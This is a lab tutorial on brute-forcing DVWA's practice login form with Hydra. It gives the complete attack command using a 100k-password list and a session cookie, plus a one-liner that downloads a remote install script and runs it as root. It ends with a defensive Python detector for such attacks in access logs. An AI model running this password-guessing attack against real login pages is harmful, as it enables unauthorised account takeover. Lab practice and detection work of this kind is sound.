Brute Force Attack on DVWA with Hydra
Hello! Today I’m going to share a simple command using a couple of tools to break the DVWA brute force lab.
Note: This is an educational tutorial. I am not responsible for any misuse of this tutorial.
Prerequisites
For this tutorial, I’m using an Ubuntu machine, but you can use Kali Linux as well. First, let’s install the necessary tools.
Step 1: Install and Configure DVWA
To get started, we need to set up the DVWA project. You can clone the repository and set up an Apache server with PHP, or you can run DVWA in Docker using this container: https://hub.docker.com/r/vulnerables/web-dvwa. The following command downloads an install script and runs it as root, so review the script first:
sudo bash -c "$(curl --fail --show-error --silent --location https://raw.githubusercontent.com/IamCarron/DVWA-Script/main/Install-DVWA.sh)"
Step 2: Install Hydra
Next, we need to install Hydra, a password-cracking tool. Even if you’re using Kali Linux, you may need to configure it:
git clone https://github.com/vanhauser-thc/thc-hydra
cd thc-hydra
./configure
make
sudo make install
hydra
Step 3: Prepare the Password Dictionary
You will need a dictionary of passwords. If you’re using Kali Linux, you can use the crunch tool to generate a password dictionary, or install crunch on your own Linux machine. For this tutorial, I'm using a list of the 100k most used passwords from the Daniel Miessler repo.
Step 4: Identify the Target
Inspect the target page to identify the names of the password fields and the form submission method (GET in this case).
Step 5: Get the Failure Message
Identify the message that appears when the login fails, for example, “Username and/or password incorrect.”
Step 6: Get the Session ID
Obtain the session ID (the PHPSESSID cookie) of a logged-in DVWA session so that the requests are not redirected to the login page. Depending on your browser, you can retrieve it in several ways, such as using a proxy.
Execute the Attack
The main command for the brute force attack with Hydra is:
hydra -L users.txt -P 100k-most-used-passwords-NCSC.txt localhost http-get-form \
"/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie: security=medium; PHPSESSID=sessionID:Username and/or password incorrect." -V
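Let’s explain the command:
- -L: file with the list of usernames to try
- -P: password dictionary file
- -V: verbose mode, which shows each attempt
- localhost: address to attack
- http-get-form: Hydra module for a login form submitted with the GET method
- /DVWA/vulnerabilities/brute/ is the path of the login form
- Lastly, we pass the form parameters, where Hydra substitutes each username and password to try for ^USER^ and ^PASS^, followed by the cookie header with the session ID and the failure message from Step 5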
Finally, we get this result
This should guide you through the process of performing a brute force attack on DVWA using Hydra. Remember to use this knowledge responsibly.
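Seen from the defending side, the Hydra run above shows up in the web server's access log as a rapid series of GET requests to /DVWA/vulnerabilities/brute/ from one client, with the guessed credentials in the query string. The detector below is an added example, not part of the original tutorial; the log lines are constructed, and the Apache combined log format, the threshold of 5 attempts and the 60-second window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Apache common/combined log prefix: client, timestamp, request line, status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
LOGIN_PATH = "/DVWA/vulnerabilities/brute/"   # path from the tutorial's command

def parse_attempt(line):
    """Return (client, time, username) for a login attempt, else None."""
    m = LINE_RE.match(line)
    if not m or m.group(3) != "GET":
        return None
    url = urlsplit(m.group(4))
    qs = parse_qs(url.query, keep_blank_values=True)
    if url.path != LOGIN_PATH or "username" not in qs or "password" not in qs:
        return None
    when = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
    return m.group(1), when, qs["username"][0]

def find_bruteforce(lines, max_attempts=5, window=timedelta(seconds=60)):
    """Flag clients sending more than max_attempts login requests per window.

    Returns {client: set of usernames targeted}. Threshold and window are
    assumed values; tune them to the application's normal login rate.
    """
    recent = defaultdict(deque)      # client -> timestamps inside the window
    targeted = defaultdict(set)      # client -> usernames seen
    flagged = {}
    for line in lines:
        attempt = parse_attempt(line)
        if attempt is None:
            continue
        client, when, user = attempt
        q = recent[client]
        q.append(when)
        while when - q[0] > window:  # drop attempts older than the window
            q.popleft()
        targeted[client].add(user)
        if len(q) > max_attempts:
            flagged[client] = targeted[client]
    return flagged

def _line(ip, sec, user, pw, path=LOGIN_PATH):
    return (f'{ip} - - [10/Mar/2025:12:00:{sec:02d} +0000] '
            f'"GET {path}?username={user}&password={pw}&Login=Login HTTP/1.1" 200 4300')

# Constructed sample: one client sends 8 guesses in 8 seconds, another logs in once.
SAMPLE_LOG = [_line("203.0.113.7", s, "admin", f"guess{s}") for s in range(8)]
SAMPLE_LOG.append(_line("198.51.100.4", 30, "gordonb", "x"))
SAMPLE_LOG.append('198.51.100.4 - - [10/Mar/2025:12:00:31 +0000] "GET /DVWA/index.php HTTP/1.1" 200 7000')
```

Because the form is submitted with GET, every guessed password, including the correct one, is written to the access log in clear text, so those logs need the same protection as the credentials themselves.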
Thanks for reading! I hope you found this tutorial helpful. Remember to use these tools responsibly. 🛡️💻
See you next time! 🚀😊